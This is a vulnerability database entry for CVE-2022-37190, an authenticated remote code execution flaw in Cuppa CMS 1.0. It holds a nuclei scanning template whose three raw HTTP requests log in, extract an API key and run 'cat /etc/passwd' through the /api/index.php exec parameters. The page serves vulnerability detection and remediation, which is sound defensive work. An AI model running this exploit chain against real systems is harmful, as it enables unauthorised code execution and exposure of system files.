Lucene search
K

Cuppa CMS v1.0 - Remote Code Execution

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 219 Views

Cuppa CMS v1.0 - RCE, allows arbitrary code execution after an authenticated user controls parameters /api/index.php. Apply security patch or update to mitigate

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-37190
13 Sep 202223:15
attackerkb
Circl
CVE-2022-37190
14 Sep 202202:25
circl
CNNVD
CuppaCMS 安全漏洞
13 Sep 202200:00
cnnvd
Check Point Advisories
CuppaCMS Remote Code Execution (CVE-2022-37190)
17 Nov 202200:00
checkpoint_advisories
CVE
CVE-2022-37190
13 Sep 202222:07
cve
Cvelist
CVE-2022-37190
13 Sep 202222:07
cvelist
NVD
CVE-2022-37190
13 Sep 202223:15
nvd
OSV
CVE-2022-37190
13 Sep 202223:15
osv
Prion
Remote code execution
13 Sep 202223:15
prion
Positive Technologies
PT-2022-23864 · Cuppacms · Cuppacms
13 Sep 202200:00
ptsecurity
Rows per page
id: CVE-2022-37190

info:
  name: Cuppa CMS v1.0 - Remote Code Execution
  author: theamanrawat
  severity: high
  description: |
    CuppaCMS 1.0 is vulnerable to Remote Code Execution (RCE). An authenticated user can control both parameters (action and function) from "/api/index.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patch or update to a patched version of Cuppa CMS v1.0 to mitigate this vulnerability.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-37190
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-37190
    cwe-id: CWE-732
    epss-score: 0.45769
    epss-percentile: 0.98653
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: cuppacms
    product: cuppacms
  tags: cve2022,cve,rce,cuppa,authenticated,cuppacms,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{password}}&language=en&task=login
      - |
        POST /components/table_manager/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        path=component%2Ftable_manager%2Fview%2Fcu_api_keys
      - |
        POST /api/index.php HTTP/1.1
        Host: {{Hostname}}
        key: {{apikey}}
        Content-Type: application/x-www-form-urlencoded

        action=system&function=exec&cmd=cat+/etc/passwd

    matchers-condition: and
    matchers:
      - type: word
        part: header_3
        words:
          - "text/html"

      - type: regex
        regex:
          - "postgres:.*:1001:"
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: apikey
        group: 1
        regex:
          - "<td class='td_key'>(.*?)</td>"
        internal: true
# digest: 490a0046304402202b4f5fcbff6434bb7a490aea9a2b4ba583eb37427d29b2a6abc1dc5b357ad67e02204300c4a7e8e015d389c64e86d1cb6cc48173f21a6692f9f020a55e8f3bb1bdd7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.18.8
EPSS0.45769
219